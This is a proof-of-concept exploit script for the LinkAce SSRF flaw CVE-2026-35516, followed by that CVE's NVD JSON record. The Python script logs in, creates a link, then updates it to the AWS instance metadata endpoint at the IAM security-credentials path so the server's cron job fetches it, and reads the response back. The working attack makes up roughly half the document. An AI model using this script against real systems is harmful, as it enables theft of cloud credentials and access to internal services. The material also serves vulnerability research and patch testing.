CVE-2026-35516

import requests # Target configuration target_url = "http://localhost:8000" username = "attacker" password = "password" # 1. Login to get session session = requests.Session() login_payload = {"email": username, "password": password} login_resp = session.post(f"{target_url}/login", data=login_payload) if login_resp.status_code != 200: print("Login failed") exit(1) # 2. Create a new link with a public URL create_payload = {"url": "http://example.com", "title": "Test Link"} create_resp = session.post(f"{target_url}/api/links", json=create_payload) link_id = create_resp.json().get('id') print(f"Created link ID: {link_id}") # 3. Update the link to a private IP (SSRF payload) # Targeting AWS IMDSv1 ssrf_payload = {"url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/"} update_resp = session.patch(f"{target_url}/api/links/{link_id}", json=ssrf_payload) if update_resp.status_code == 200: print("Link updated to internal IP. Waiting for cron job...") else: print("Update failed") # 4. Check the link details to see the response (if cached or returned) # Note: Exploitation depends on the 'links:check' cron job running server-side check_resp = session.get(f"{target_url}/api/links/{link_id}") print(f"Link details: {check_resp.text}")

{"cve": {"id": "CVE-2026-35516", "sourceIdentifier": "[email protected]", "published": "2026-04-07T16:16:27.937", "lastModified": "2026-04-14T20:27:53.187", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "LinkAce is a self-hosted archive to collect website links. Prior to 2.5.4, LinkRepository::update and CheckLinksCommand::checkLink do not check for private IPs. An authenticated user can read responses from internal services (AWS IMDSv1, cloud metadata, internal APIs) by creating a link with a public URL and then updating it to a private IP. The links:check cron job makes the request server-side without IP filtering. This can expose cloud credentials, internal service data, and network topology. This vulnerability is fixed in 2.5.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N", "baseScore": 5.0, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:linkace:linkace:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.5.4", "matchCriteriaId": "1B6A4089-79B4-45A5-AF07-95336D858B6E"}]}]}], "references": [{"url": "https://github.com/Kovah/LinkAce/security/advisories/GHSA-4jhm-r4f5-p7xm", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}, {"url": "https://github.com/Kovah/LinkAce/security/advisories/GHSA-4jhm-r4f5-p7xm", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}